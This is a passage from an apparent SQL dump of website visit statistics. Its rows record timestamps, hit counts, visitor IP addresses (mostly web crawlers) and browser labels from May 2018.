ther'),(244539,1526206591,1,1,0,0,'178.154.200.41','other'),(244540,1526206725,1,1,0,0,'54.36.148.87','other'),(244541,1526206937,1,1,0,0,'178.154.171.88','other'),(244542,1526206974,1,1,0,0,'141.8.142.74','other'),(244543,1526207246,1,1,0,0,'54.36.148.62','other'),(244544,1526207281,1,1,0,0,'88.99.194.48','firefox'),(244545,1526207482,1,1,0,0,'54.36.149.58','other'),(244546,1526207506,1,1,0,0,'207.46.13.0','other'),(244547,1526207555,1,1,0,0,'54.36.148.163','other'),(244548,1526207783,1,1,0,0,'66.249.64.29','chrome'),(244549,1526208334,1,1,0,0,'37.9.113.182','other'),(244550,1526208369,1,1,0,0,'54.36.148.45','other'),(244551,1526208486,1,1,0,0,'54.36.148.216','other'),(244552,1526208493,1,1,0,0,'54.36.148.249','other'),(244553,1526208505,2,2,0,0,'141.8.142.74','other'),(244554,1526208747,1,1,0,0,'54.36.149.26','other'),(244555,1526209092,2,2,0,0,'216.244.66.237','other'),(244556,1526209217,1,1,0,0,'54.36.148.65','other'),(244557,1526209789,1,1,0,0,'54.36.148.72','other'),(244558,1526209907,1,1,0,0,'54.36.148.239','other'),(244559,1526209997,1,1,0,0,'46.161.9.39','chrome'),(244560,1526209999,1,1,0,0,'54.36.149.86','other'),(244561,1526210036,1,1,0,0,'54.36.149.43','other'),(244562,1526210188,1,1,0,0,'54.36.148.176','other'),(244563,1526210249,1,1,0,0,'8.29.198.26','other'),(244564,1526210308,1,1,0,0,'54.36.149.20','other'),(244565,1526210418,1,1,0,0,'35.226.23.240','other'),(244566,1526210467,1,1,0,0,'54.36.148.131','other'),(244567,1526210791,1,1,0,0,'141.8.142.74','other'),(244568,1526210794,1,1,0,0,'54.36.149.105','other'),(244569,1526211165,1,1,0,0,'54.36.148.183','other'),(244570,1526211529,1,1,0,0,'54.36.148.103','other'),(244571,1526211915,1,1,0,0,'178.154.171.88','other'),(244572,1526212157,1,1,0,0,'141.8.142.74','other'),(244573,1526212493,1,1,0,0,'54.36.148.79','other'),(244574,1526212712,1,1,0,0,'54.36.148.113','other'),(244575,1526212731,1,1,0,0,'77.52.200.10','firefox'),(244576,1526212819,1,1,0,0,'54.36.148.42','other'),(244577,1526213047,1,1,0,0,'54.36.148.65','other'),(244578,1526213267,1,1,0,0,'54.36.149.69','other'),(244579,1526213342,1,1,0,0,'54.36.148.185','other'),(244580,1526213678,1,1,0,0,'216.145.14.142','firefox'),(244581,1526214564,1,1,0,0,'54.36.148.82','other'),(244582,1526214662,1,1,0,0,'54.36.148.170','other'),(244583,1526215185,1,1,0,0,'54.36.148.96','other'),(244584,1526215308,1,1,0,0,'144.76.108.21','other'),(244585,1526215341,1,1,0,0,'54.36.149.107','other'),(244586,1526215348,1,1,0,0,'54.36.148.173','other'),(244587,1526215463,1,1,0,0,'54.36.148.116','other'),(244588,1526215811,1,1,0,0,'180.76.15.135','other'),(244589,1526215869,1,1,0,0,'54.36.148.227','other'),(244590,1526215951,1,1,0,0,'8.29.198.26','other'),(244591,1526216159,1,1,0,0,'54.36.149.104','other'),(244592,1526216196,1,1,0,0,'54.36.148.12','other'),(244593,1526216248,1,1,0,0,'35.226.23.240','other'),(244594,1526216282,1,1,0,0,'54.36.149.1','other'),(244595,1526216406,1,1,0,0,'37.54.115.142','chrome'),(244596,1526216408,1,1,0,0,'54.36.148.160','other'),(244597,1526216487,1,1,0,0,'54.36.148.221','other'),(244598,1526216566,1,1,0,0,'54.36.149.2','other'),(244599,1526216684,1,1,0,0,'54.36.149.61','other'),(244600,1526216758,1,1,0,0,'54.36.148.28','other'),(244601,1526217449,1,1,0,0,'40.77.167.178','other'),(244602,1526217523,1,0,1,0,'66.249.64.29',''),(244603,1526217657,1,1,0,0,'178.154.171.88','other'),(244604,1526218038,1,1,0,0,'54.36.148.111','other'),(244605,1526218075,1,1,0,0,'54.36.148.80','other'),(244606,1526218268,1,1,0,0,'216.244.66.237','other'),(244607,1526218368,1,1,0,0,'54.36.148.159','other'),(244608,1526219019,1,1,0,0,'141.8.142.74','other'),(244609,1526219052,1,1,0,0,'54.36.148.182','other'),(244610,1526219073,1,1,0,0,'54.36.148.82','other'),(244611,1526219299,1,1,0,0,'87.250.224.46','other'),(244612,1526219494,1,1,0,0,'54.36.148.183','other'),(244613,1526219819,1,1,0,0,'54.36.148.209','other'),(244614,1526219833,1,1,0,0,'54.36.148.181','other'),(244615,1526219910,1,1,0,0,'54.36.148.119','other'),(244616,1526219977,1,1,0,0,'141.8.142.74','other'),(244617,1526220020,1,1,0,0,'54.36.149.85','other'),(244618,1526220040,1,1,0,0,'91.196.178.11','chrome'),(244619,1526220089,1,1,0,0,'216.244.66.237','other'),(244620,1526220240,1,1,0,0,'54.36.148.180','other'),(244621,1526220340,1,1,0,0,'54.36.148.246','other'),(244622,1526220369,1,1,0,0,'193.106.30.99','firefox'),(244623,1526220425,1,1,0,0,'54.36.148.123','other'),(244624,1526220675,1,1,0,0,'54.36.148.175','other'),(244625,1526220857,1,1,0,0,'54.36.149.7','other'),(244626,1526220880,1,1,0,0,'180.76.15.17','other'),(244627,1526221075,1,1,0,0,'8.29.198.27','other'),(244628,1526221113,1,1,0,0,'54.36.149.89','other'),(244629,1526221115,1,1,0,0,'54.36.148.199','other'),(244630,1526221147,1,1,0,0,'54.36.149.0','other'),(244631,1526221370,1,1,0,0,'54.36.148.62','other'),(244632,1526221468,1,1,0,0,'216.244.66.237','other'),(244633,1526221474,1,1,0,0,'54.36.148.45','other'),(244634,1526221996,1,1,0,0,'54.36.149.44','other'),(244635,1526222375,1,1,0,0,'207.46.13.170','other'),(244636,1526222823,1,1,0,0,'54.36.148.146','other'),(244637,1526222985,1,1,0,0,'54.36.148.83','other'),(244638,1526223004,1,1,0,0,'54.36.148.153','other'),(244639,1526223384,1,1,0,0,'54.36.149.38','other'),(244640,1526223917,1,1,0,0,'54.36.148.203','other'),(244641,1526224035,1,1,0,0,'54.36.149.55','other'),(244642,1526224057,1,1,0,0,'54.36.149.64','other'),(244643,1526224271,1,0,1,0,'66.249.64.28',''),(244644,1526224834,1,1,0,0,'54.36.149.24','other'),(244645,1526224921,2,2,0,0,'141.8.142.74','other'),(244646,1526224970,1,1,0,0,'54.36.148.105','other'),(244647,1526224973,1,1,0,0,'46.161.9.39','firefox'),(244648,1526225096,1,1,0,0,'54.36.148.236','other'),(244649,1526225243,1,1,0,0,'54.36.149.14','other'),(244650,1526225322,1,1,0,0,'54.36.149.46','other'),(244651,1526225336,1,1,0,0,'54.36.148.78','other'),(244652,1526225454,1,1,0,0,'54.36.148.79','other'),(244653,1526225455,1,1,0,0,'54.36.148.125','other'),(244654,1526225669,1,1,0,0,'54.36.149.84','other'),(244655,1526225919,1,1,0,0,'54.36.148.207','other'),(244656,1526226094,1,1,0,0,'54.36.148.254','other'),(244657,1526226165,1,1,0,0,'54.36.148.168','other'),(244658,1526226351,1,1,0,0,'207.46.13.0','other'),(244659,1526226353,1,1,0,0,'54.36.148.10','other'),(244660,1526226749,1,1,0,0,'54.36.149.62','other'),(244661,1526226788,1,1,0,0,'8.29.198.26','other'),(244662,1526227057,1,1,0,0,'54.36.148.27','other'),(244663,1526227462,1,1,0,0,'54.36.149.82','other'),(244664,1526227589,2,2,0,0,'141.8.142.74','other'),(244665,1526227687,1,1,0,0,'35.226.23.240','other'),(244666,1526227800,1,1,0,0,'54.36.148.58','other'),(244667,1526227903,1,1,0,0,'54.36.148.115','other'),(244668,1526228166,1,1,0,0,'54.36.148.37','other'),(244669,1526228423,1,1,0,0,'54.36.148.132','other'),(244670,1526228623,1,1,0,0,'54.36.149.23','other'),(244671,1526228807,2,2,0,0,'141.8.142.74','other'),(244672,1526228881,1,1,0,0,'66.249.64.29','chrome'),(244673,1526228936,1,1,0,0,'54.36.148.170','other'),(244674,1526229045,1,1,0,0,'54.36.148.176','other'),(244675,1526229226,1,1,0,0,'54.36.148.55','other'),(244676,1526229378,1,1,0,0,'54.36.149.106','other'),(244677,1526229847,1,1,0,0,'178.154.171.88','other'),(244678,1526230126,1,1,0,0,'54.36.148.108','other'),(244679,1526230291,1,1,0,0,'54.36.149.16','other'),(244680,1526230606,1,1,0,0,'31.43.239.54','firefox'),(244681,1526230715,1,1,0,0,'54.36.149.35','other'),(244682,1526230951,1,1,0,0,'54.36.149.24','other'),(244683,1526231469,1,1,0,0,'95.134.171.206','chrome'),(244684,1526231631,1,1,0,0,'54.36.149.102','other'),(244685,1526231878,2,2,0,0,'216.244.66.237','other'),(244686,1526231891,1,1,0,0,'54.36.148.30','other'),(244687,1526231906,1,1,0,0,'8.29.198.25','other'),(244688,1526232357,1,1,0,0,'54.36.148.165','other'),(244689,1526232442,1,1,0,0,'54.36.148.75','other'),(244690,1526232479,1,1,0,0,'54.36.149.92','other'),(244691,1526233159,1,1,0,0,'54.36.149.69','other'),(244692,1526233563,1,1,0,0,'54.36.148.53','other'),(244693,1526233648,1,1,0,0,'54.36.148.153','other'),(244694,1526234087,1,1,0,0,'54.36.149.89','other'),(244695,1526234121,1,1,0,0,'54.36.149.39','other'),(244696,1526234132,1,1,0,0,'54.36.148.185','other'),(244697,1526234249,1,1,0,0,'141.8.142.74','other'),(244698,1526234312,1,1,0,0,'54.36.149.26','other'),(244699,1526234447,1,1,0,0,'54.36.148.43','other'),(244700,1526234909,1,1,0,0,'178.154.171.88','other'),(244701,1526234911,1,1,0,0,'157.55.39.219','other'),(244702,1526235199,1,1,0,0,'54.36.149.85','other'),(244703,1526235450,1,1,0,0,'54.36.149.107','other'),(244704,1526235665,1,1,0,0,'54.36.148.214','other'),(244705,1526235727,1,1,0,0,'54.36.148.185','other'),(244706,1526236047,1,1,0,0,'178.154.171.88','other'),(244707,1526236597,1,1,0,0,'217.69.133.9','other'),(244708,1526236720,1,1,0,0,'54.36.149.78','other'),(244709,1526237107,11,11,0,0,'94.142.140.211','firefox'),(244710,1526237348,1,1,0,0,'141.8.142.74','other'),(244711,1526237438,1,1,0,0,'54.36.148.122','other'),(244712,1526237634,1,1,0,0,'8.29.198.27','other'),(244713,1526237731,1,1,0,0,'54.36.148.176','other'),(244714,1526237740,1,1,0,0,'54.36.148.243','other'),(244715,1526237814,1,1,0,0,'54.36.149.8','other'),(244716,1526237914,1,1,0,0,'35.226.23.240','other'),(244717,1526238252,1,1,0,0,'141.8.142.74','other'),(244718,1526238279,1,1,0,0,'54.36.148.21','other'),(244719,1526238442,1,1,0,0,'54.36.148.202','other'),(244720,1526238798,2,2,0,0,'54.36.148.68','other'),(244721,1526238926,3,3,0,0,'66.249.64.29','chrome'),(244722,1526238996,1,1,0,0,'66.249.64.28','chrome'),(244723,1526239063,1,1,0,0,'54.36.149.69','other'),(244724,1526239342,1,1,0,0,'54.36.148.219','other'),(244725,1526239371,1,1,0,0,'54.36.149.83','other'),(244726,1526239454,1,1,0,0,'180.76.15.159','other'),(244727,1526239554,1,1,0,0,'54.36.148.175','other'),(244728,1526239737,1,1,0,0,'54.36.148.114','other'),(244729,1526239891,1,1,0,0,'54.36.149.2','other'),(244730,1526239949,1,1,0,0,'54.36.148.245','other'),(244731,1526240825,1,1,0,0,'54.36.148.249','other'),(244732,1526240849,1,1,0,0,'178.154.171.55','other'),(244733,1526240905,1,1,0,0,'54.36.148.62','other'),(244734,1526241035,1,1,0,0,'54.36.149.3','other'),(244735,1526241116,1,1,0,0,'54.36.148.189','other'),(244736,1526241446,1,1,0,0,'54.36.148.177','other'),(244737,1526241608,1,1,0,0,'54.36.148.169','other'),(244738,1526241655,1,1,0,0,'54.36.148.79','other'),(244739,1526241901,1,1,0,0,'54.36.149.78','other'),(244740,1526242215,1,1,0,0,'54.36.148.23','other'),(244741,1526242222,1,1,0,0,'54.36.148.209','other'),(244742,1526242288,1,1,0,0,'54.36.148.160','other'),(244743,1526242302,1,1,0,0,'54.36.148.242','other'),(244744,1526242709,1,1,0,0,'193.106.30.99','firefox'),(244745,1526242729,1,1,0,0,'8.29.198.27','other'),(244746,1526242948,1,1,0,0,'54.36.148.197','other'),(244747,1526243014,1,1,0,0,'54.36.148.80','other'),(244748,1526243027,1,1,0,0,'54.36.149.4','other'),(244749,1526243892,1,1,0,0,'54.36.149.59','other'),(244750,1526243976,1,1,0,0,'54.36.148.42','other'),(244751,1526244103,1,1,0,0,'216.244.66.237','other'),(244752,1526244131,2,2,0,0,'141.8.142.74','other'),(244753,1526245146,1,1,0,0,'54.36.148.74','other'),(244754,1526245677,1,1,0,0,'54.36.148.83','other'),(244755,1526245829,1,1,0,0,'157.55.39.219','other'),(244756,1526246079,1,1,0,0,'54.36.148.61','other'),(244757,1526246149,1,1,0,0,'54.36.148.18','other'),(244758,1526246463,1,1,0,0,'54.36.148.30','other'),(244759,1526246506,2,2,0,0,'54.36.149.49','other'),(244760,1526246681,1,1,0,0,'54.36.148.137','other'),(244761,1526247287,1,1,0,0,'178.154.171.4','other'),(244762,1526247386,1,0,1,0,'66.249.64.28',''),(244763,1526247726,1,1,0,0,'54.36.149.102','other'),(244764,1526247837,1,1,0,0,'54.36.149.62','other'),(244765,1526248074,1,1,0,0,'54.36.148.22','other'),(244766,1526248135,1,1,0,0,'54.36.148.172','other'),(244767,1526248476,1,1,0,0,'8.29.198.27','other'),(244768,1526248874,1,1,0,0,'54.36.149.47','other'),(244769,1526249277,1,0,1,0,'66.249.64.29',''),(244770,1526249474,1,1,0,0,'54.36.148.56','other'),(244771,1526249610,1,1,0,0,'54.36.148.225','other'),(244772,1526249659,1,1,0,0,'54.36.148.30','other'),(244773,1526249734,1,1,0,0,'54.36.149.34','other'),(244774,1526249753,1,1,0,0,'54.36.148.224','other'),(244775,1526250045,1,1,0,0,'157.55.39.219','other'),(244776,1526250288,1,1,0,0,'216.244.66.237','other'),(244777,1526250517,1,1,0,0,'54.36.148.168','other'),(244778,1526250538,1,1,0,0,'54.36.149.2','other'),(244779,1526250604,1,1,0,0,'54.36.148.255','other'),(244780,1526251445,1,1,0,0,'66.249.64.28','chrome'),(244781,1526251630,1,1,0,0,'54.36.148.163','other'),(244782,1526251679,1,1,0,0,'54.36.148.250','other'),(244783,1526251834,1,1,0,0,'54.36.148.254','other'),(244784,1526251999,1,1,0,0,'207.46.13.0','other'),(244785,1526252123,1,1,0,0,'54.36.148.39','other'),(244787,1526252155,1,1,0,0,'141.8.142.74','other'),(244788,1526252169,1,1,0,0,'54.36.148.108','other'),(244789,1526252320,1,1,0,0,'54.36.149.93','other'),(244790,1526252564,1,1,0,0,'54.36.149.61','other'),(244791,1526253018,1,1,0,0,'54.36.148.210','other'),(244792,1526253230,1,1,0,0,'54.36.148.175','other'),(244793,1526253557,1,1,0,0,'8.29.198.27','other'),(244794,1526254074,1,1,0,0,'54.36.149.89','other'),(244795,1526254137,1,1,0,0,'54.36.148.202','other'),(244796,1526254244,1,1,0,0,'54.36.148.16','other'),(244797,1526254266,1,1,0,0,'54.36.148.68','other'),(244798,1526254624,1,1,0,0,'178.154.171.88','other'),(244799,1526254794,1,1,0,0,'54.36.148.167','other'),(244800,1526255034,1,1,0,0,'54.36.148.229','other'),(244801,1526255144,1,1,0,0,'54.36.149.101','other'),(244802,1526255326,1,0,1,0,'66.249.64.30',''),(244803,1526255543,1,1,0,0,'54.36.148.95','other'),(244804,1526256209,1,1,0,0,'141.8.142.74','other'),(244805,1526256273,1,1,0,0,'54.36.148.89','other'),(244806,1526256565,1,1,0,0,'46.161.9.39','chrome'),(244807,1526256795,1,1,0,0,'54.36.148.32','other'),(244808,1526256821,1,1,0,0,'54.36.148.180','other'),(244809,1526257638,1,1,0,0,'54.36.148.144','other'),(244810,1526257639,1,1,0,0,'91.209.11.236','other'),(244811,1526257859,1,1,0,0,'54.36.148.107','other'),(244812,1526258188,1,1,0,0,'54.36.149.13','other'),(244813,1526258293,1,1,0,0,'54.36.148.30','other'),(244814,1526258354,2,2,0,0,'54.36.148.252','other'),(244815,1526258427,1,1,0,0,'54.36.148.22','other'),(244816,1526258457,1,1,0,0,'54.36.148.203','other'),(244817,1526258523,1,1,0,0,'54.36.148.214','other'),(244818,1526258706,1,1,0,0,'54.36.148.228','other'),(244819,1526258713,1,1,0,0,'54.36.148.136','other'),(244820,1526258745,1,1,0,0,'54.36.148.77','other'),(244821,1526258783,1,1,0,0,'54.36.149.84','other'),(244822,1526259062,1,1,0,0,'54.36.148.94','other'),(244823,1526259158,1,1,0,0,'54.36.148.147','other'),(244824,1526259311,1,1,0,0,'8.29.198.27','other'),(244825,1526259312,1,1,0,0,'54.36.148.148','other'),(244826,1526259939,1,1,0,0,'54.36.149.101','other'),(244827,1526260006,1,1,0,0,'54.36.149.68','other'),(244828,1526260417,1,1,0,0,'54.36.148.176','other'),(244829,1526260451,1,1,0,0,'35.226.23.240','other'),(244830,1526260502,1,1,0,0,'54.36.149.23','other'),(244831,1526260873,1,1,0,0,'178.154.171.88','other'),(244832,1526260987,1,1,0,0,'54.36.148.77','other'),(244833,1526261044,1,1,0,0,'54.36.149.83','other'),(244834,1526261530,1,1,0,0,'207.46.13.0','other'),(244835,1526261652,1,1,0,0,'54.36.148.173','other'),(244836,1526262056,1,1,0,0,'54.36.148.142','other'),(244837,1526262294,1,1,0,0,'54.36.148.212','other'),(244838,1526262469,1,1,0,0,'54.36.148.77','other'),(244839,1526262487,1,1,0,0,'54.36.148.171','other'),(244840,1526262606,1,1,0,0,'87.250.224.46','other'),(244841,1526262666,1,1,0,0,'54.36.149.92','other'),(244842,1526262885,1,1,0,0,'54.36.149.51','other'),(244843,1526263257,1,0,1,0,'66.249.64.28',''),(244844,1526263521,1,1,0,0,'141.8.142.74','other'),(244845,1526263882,1,1,0,0,'54.36.148.145','other'),(244846,1526264296,6,0,6,0,'66.249.70.25',''),(244847,1526264311,2,0,2,0,'66.249.64.30',''),(244848,1526264386,1,1,0,0,'8.29.198.25','other'),(244849,1526264537,2,0,2,0,'66.249.64.29',''),(244850,1526264581,1,1,0,0,'54.36.148.56','other'),(244851,1526264636,1,1,0,0,'54.36.148.181','other'),(244852,1526264654,5,3,2,0,'66.249.64.28',''),(244853,1526264714,1,1,0,0,'54.36.148.241','other'),(244854,1526264833,1,1,0,0,'54.36.148.152','other'),(244855,1526265003,1,1,0,0,'54.36.149.47','other'),(244856,1526265015,2,2,0,0,'54.36.149.22','other'),(244857,1526265045,1,1,0,0,'54.36.149.52','other'),(244858,1526265053,4,0,4,0,'66.249.70.29',''),(244859,1526265287,4,1,3,0,'66.249.70.25',''),(244860,1526265295,4,4,0,0,'66.249.64.29','chrome'),(244861,1526265342,4,0,4,0,'66.249.70.27',''),(244862,1526265419,2,1,1,0,'66.249.64.28',''),(244863,1526265482,2,1,1,0,'66.249.64.30',''),(244864,1526265565,1,1,0,0,'54.36.149.82','other'),(244865,1526265578,1,1,0,0,'54.36.148.235','other'),(244866,1526265679,1,1,0,0,'95.216.6.41','other'),(244867,1526266372,1,1,0,0,'54.36.148.156','other'),(244868,1526266614,1,1,0,0,'54.36.148.83','other'),(244869,1526266709,1,1,0,0,'216.244.66.237','other'),(244870,1526266748,1,1,0,0,'54.36.149.92','other'),(244871,1526266789,2,2,0,0,'141.8.142.74','other'),(244872,1526267104,1,1,0,0,'54.36.149.56','other'),(244873,1526267578,1,1,0,0,'54.36.148.124','other'),(244874,1526267643,1,1,0,0,'216.244.66.237','other'),(244875,1526267680,1,1,0,0,'54.36.149.92','other'),(244876,1526267712,1,1,0,0,'193.106.30.99','firefox'),(244877,1526268074,1,1,0,0,'54.36.148.180','other'),(244878,1526268411,1,1,0,0,'54.36.148.197','other'),(244879,1526268494,1,1,0,0,'54.36.149.6','other'),(244880,1526268580,1,1,0,0,'54.36.148.182','other'),(244881,1526269070,1,1,0,0,'54.36.149.102','other'),(244882,1526269156,1,1,0,0,'54.36.149.62','other'),(244883,1526269187,1,1,0,0,'54.36.148.80','other'),(244884,1526269261,29,29,0,0,'178.151.245.174','other'),(244885,1526269311,1,1,0,0,'54.36.148.124','other'),(244886,1526269597,1,1,0,0,'216.244.66.237','other'),(244887,1526269692,1,1,0,0,'54.36.148.58','other'),(244888,1526269714,1,1,0,0,'163.172.4.153','chrome'),(244889,1526269735,1,1,0,0,'54.36.148.83','other'),(244890,1526269839,1,0,1,0,'66.249.64.29',''),(244891,1526270145,1,1,0,0,'8.29.198.27','other'),(244892,1526270690,1,1,0,0,'54.36.149.29','other'),(244893,1526270881,1,1,0,0,'54.36.148.147','other'),(244894,1526270972,1,1,0,0,'54.36.148.84','other'),(244895,1526271747,1,1,0,0,'141.8.142.74','other'),(244896,1526272252,2,2,0,0,'178.154.171.88','other'),(244897,1526272422,1,1,0,0,'66.249.70.27','chrome'),(244898,1526272437,1,1,0,0,'66.249.64.28','chrome'),(244899,1526272727,1,1,0,0,'54.36.148.23','other'),(244900,1526273333,1,1,0,0,'54.36.148.68','other'),(244901,1526273375,1,1,0,0,'54.36.148.111','other'),(244902,1526273486,1,1,0,0,'54.36.148.48','other'),(244903,1526273564,1,1,0,0,'54.36.149.75','other'),(244904,1526273611,1,1,0,0,'216.244.66.237','other'),(244905,1526273948,1,1,0,0,'141.8.142.74','other'),(244906,1526274376,1,1,0,0,'54.36.148.56','other'),(244907,1526274766,1,1,0,0,'54.36.148.28','other'),(244908,1526274781,1,1,0,0,'54.36.148.83','other'),(244909,1526274807,1,1,0,0,'54.36.149.53','other'),(244910,1526275118,1,1,0,0,'207.46.13.0','other'),(244911,1526275214,1,1,0,0,'8.29.198.27','other'),(244912,1526275245,1,1,0,0,'54.36.148.34','other'),(244913,1526275254,1,1,0,0,'54.36.148.175','other'),(244914,1526275440,1,1,0,0,'54.36.148.86','other'),(244915,1526275475,1,1,0,0,'95.135.55.200','chrome'),(244916,1526275783,1,1,0,0,'204.79.180.5','msie'),(244917,1526276020,1,1,0,0,'54.36.149.45','other'),(244918,1526276061,1,1,0,0,'54.36.149.46','other'),(244919,1526276200,1,1,0,0,'54.36.148.91','other'),(244920,1526276241,1,1,0,0,'157.55.39.114','other'),(244921,1526276419,1,1,0,0,'54.36.149.6','other'),(244922,1526276542,2,2,0,0,'91.196.178.169','chrome'),(244923,1526276621,1,1,0,0,'54.36.149.17','other'),(244924,1526276764,1,1,0,0,'54.36.148.234','other'),(244925,1526276839,1,1,0,0,'54.36.148.242','other'),(244926,1526276907,1,1,0,0,'54.36.149.96','other'),(244927,1526277245,1,1,0,0,'54.36.148.91','other'),(244928,1526277299,1,1,0,0,'54.36.148.212','other'),(244929,1526277360,1,1,0,0,'46.161.9.39','firefox'),(244930,1526277505,1,1,0,0,'54.36.148.141','other'),(244931,1526277615,1,1,0,0,'54.36.149.97','other'),(244932,1526278235,1,1,0,0,'185.109.54.122','chrome'),(244933,1526278297,1,1,0,0,'178.154.171.88','other'),(244934,1526278421,1,1,0,0,'54.36.148.225','other'),(244935,1526278515,1,1,0,0,'95.132.23.133','firefox'),(244936,1526278522,1,1,0,0,'54.36.149.84','other'),(244937,1526278923,2,2,0,0,'78.111.190.135','chrome'),(244938,1526279093,1,1,0,0,'54.36.148.133','other'),(244939,1526279409,1,1,0,0,'54.36.148.147','other'),(244940,1526279683,1,1,0,0,'54.36.148.21','other'),(244941,1526279843,1,1,0,0,'54.36.149.28','other'),(244942,1526279870,1,1,0,0,'176.120.99.194','chrome'),(244943,1526280122,1,1,0,0,'91.209.11.236','other'),(244944,1526280988,1,1,0,0,'8.29.198.25','other'),(244945,1526281160,2,2,0,0,'91.196.178.102','chrome'),(244946,1526281299,1,1,0,0,'141.8.142.74','other'),(244947,1526281397,1,1,0,0,'54.36.149.97','other'),(244948,1526281412,1,1,0,0,'54.36.148.179','other'),(244949,1526281470,1,1,0,0,'54.36.149.3','other'),(244950,1526281521,1,1,0,0,'54.36.148.234','other'),(244951,1526281780,2,2,0,0,'91.124.43.222','chrome'),(244952,1526281846,11,11,0,0,'69.197.177.50','other'),(244953,1526282220,1,1,0,0,'54.36.149.61','other'),(244954,1526282225,1,1,0,0,'54.36.148.76','other'),(244955,1526282550,1,1,0,0,'54.36.149.99','other'),(244956,1526282589,1,1,0,0,'54.36.148.58','other'),(244957,1526282771,1,1,0,0,'54.36.148.100','other'),(244958,1526282786,1,1,0,0,'54.36.149.76','other'),(244959,1526282788,1,1,0,0,'85.115.62.180','other'),(244960,1526282861,1,1,0,0,'54.36.149.80','other'),(244961,1526282870,1,1,0,0,'54.36.149.54','other'),(244962,1526283155,1,1,0,0,'54.36.148.205','other'),(244963,1526283168,1,1,0,0,'95.132.23.133','firefox'),(244964,1526283308,1,1,0,0,'54.36.148.155','other'),(244965,1526283473,1,1,0,0,'54.36.149.22','other'),(244966,1526283635,1,1,0,0,'54.36.149.75','other'),(244967,1526283658,1,1,0,0,'91.196.178.102','chrome'),(244968,1526283734,1,1,0,0,'54.36.148.224','other'),(244969,1526283749,1,1,0,0,'54.36.148.72','other'),(244970,1526283875,1,1,0,0,'54.36.148.190','other'),(244971,1526283996,1,1,0,0,'178.154.171.88','other'),(244972,1526284085,1,1,0,0,'54.36.148.188','other'),(244973,1526284598,1,1,0,0,'54.36.148.202','other'),(244974,1526284627,1,1,0,0,'54.36.148.124','other'),(244975,1526284736,1,1,0,0,'54.36.149.59','other'),(244976,1526284904,1,0,1,0,'66.249.64.30',''),(244977,1526285157,1,1,0,0,'54.36.148.209','other'),(244978,1526285558,1,1,0,0,'216.244.66.237','other'),(244979,1526285812,1,1,0,0,'54.36.148.211','other'),(244980,1526285868,1,1,0,0,'46.201.250.174','chrome'),(244981,1526285922,2,2,0,0,'91.196.178.169','chrome'),(244982,1526285938,1,1,0,0,'54.36.148.238','other'),(244983,1526286029,1,1,0,0,'54.36.148.30','other'),(244984,1526286035,1,1,0,0,'8.29.198.27','other'),(244985,1526286134,1,1,0,0,'141.8.142.74','other'),(244986,1526286155,1,1,0,0,'54.36.149.59','other'),(244987,1526286385,1,1,0,0,'91.196.178.132','firefox'),(244988,1526286405,1,1,0,0,'54.36.148.128','other'),(244989,1526286565,1,1,0,0,'54.36.148.187','other'),(244990,1526286925,1,1,0,0,'54.36.148.35','other'),(244991,1526286994,1,1,0,0,'216.244.66.237','other'),(244992,1526287143,1,1,0,0,'31.42.161.141','chrome'),(244993,1526287172,2,2,0,0,'92.112.125.243','chrome'),(244994,1526287398,1,1,0,0,'77.52.200.10','chrome'),(244995,1526287476,1,1,0,0,'141.8.142.74','other'),(244996,1526287809,2,2,0,0,'91.196.178.16','chrome'),(244997,1526287849,1,1,0,0,'54.36.148.123','other'),(244998,1526288026,1,1,0,0,'54.36.148.23','other'),(244999,1526288188,1,1,0,0,'54.36.149.87','other'),(245000,1526288451,1,1,0,0,'178.154.171.88','other'),(245001,1526288842,1,1,0,0,'54.36.149.30','other'),(245002,1526289122,1,1,0,0,'54.36.149.97','other'),(245003,1526289609,1,1,0,0,'176.48.92.178','chrome'),(245004,1526290009,1,1,0,0,'54.36.149.58','other'),(245005,1526290481,1,1,0,0,'130.180.216.192','chrome'),(245006,1526290752,1,1,0,0,'141.8.142.74','other'),(245007,1526290783,1,1,0,0,'35.226.23.240','other'),(245008,1526290839,1,1,0,0,'54.36.149.51','other'),(245009,1526291040,1,1,0,0,'54.36.148.129','other'),(245010,1526291364,1,1,0,0,'37.9.113.101','other'),(245011,1526291622,1,1,0,0,'54.36.149.45','other'),(245012,1526291782,1,1,0,0,'54.36.148.154','other'),(245013,1526291786,1,1,0,0,'178.154.200.41','other'),(245014,1526291820,1,1,0,0,'8.29.198.27','other'),(245015,1526291900,1,1,0,0,'130.180.218.209','chrome'),(245016,1526292029,1,1,0,0,'180.76.15.32','other'),(245017,1526292094,3,3,0,0,'195.3.207.50','chrome'),(245018,1526292202,1,0,1,0,'66.249.64.29',''),(245019,1526292227,1,1,0,0,'54.36.148.191','other'),(245020,1526292718,1,1,0,0,'35.226.23.240','other'),(245021,1526292822,1,1,0,0,'91.196.178.74','firefox'),(245022,1526293424,1,1,0,0,'141.8.142.74','other'),(245023,1526293825,1,1,0,0,'54.36.148.199','other'),(245024,1526294110,1,1,0,0,'54.36.149.43','other'),(245025,1526294628,1,1,0,0,'54.36.148.217','other'),(245026,1526294708,1,0,1,0,'66.249.70.29',''),(245027,1526294830,1,1,0,0,'54.36.148.153','other'),(245028,1526295669,1,1,0,0,'193.106.30.99','firefox'),(245029,1526296116,1,1,0,0,'54.36.149.7','other'),(245030,1526296171,1,1,0,0,'54.36.148.196','other'),(245031,1526296232,1,1,0,0,'54.36.148.168','other'),(245032,1526296261,1,0,1,0,'66.249.64.30',''),(245033,1526296548,1,1,0,0,'216.244.66.237','other'),(245034,1526296673,1,1,0,0,'54.36.148.199','other'),(245035,1526296689,1,1,0,0,'54.36.149.93','other'),(245036,1526296862,1,1,0,0,'8.29.198.26','other'),(245037,1526296957,1,1,0,0,'78.111.190.142','chrome'),(245038,1526297014,1,1,0,0,'54.36.148.15','other'),(245039,1526297049,1,0,1,0,'66.249.64.28',''),(245040,1526297071,1,1,0,0,'54.36.149.58','other'),(245041,1526297300,1,1,0,0,'54.36.148.225','other'),(245042,1526297362,2,2,0,0,'167.99.237.112','firefox'),(245043,1526297397,1,1,0,0,'54.36.149.2','other'),(245044,1526297555,1,1,0,0,'95.135.12.30','chrome'),(245045,1526297621,1,1,0,0,'54.36.148.84','other'),(245046,1526297903,1,1,0,0,'54.36.149.6','other'),(245047,1526297917,1,1,0,0,'54.36.148.202','other'),(245048,1526297927,1,1,0,0,'178.95.214.218','chrome'),(245049,1526298010,1,1,0,0,'31.43.31.68','chrome'),(245050,1526298403,1,1,0,0,'54.36.148.69','other'),(245051,1526298568,1,1,0,0,'54.36.148.51','other'),(245052,1526298576,1,1,0,0,'199.58.86.206','other'),(245053,1526298695,1,1,0,0,'54.36.148.40','other'),(245054,15262